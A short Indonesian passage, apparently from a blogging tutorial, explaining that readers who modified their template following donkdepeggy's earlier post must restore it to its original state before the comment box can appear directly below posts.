melakukan tutorial yang donkdepeggy berikan. Namun bagaimana kalau sudah di otak atik seperti yang donkdepeggy posting di sini!, tentu saja anda tidak bisa begitu saja membuat kotak komentar langsung di bawah posting namun harus mengembalikan kepada kondisi semula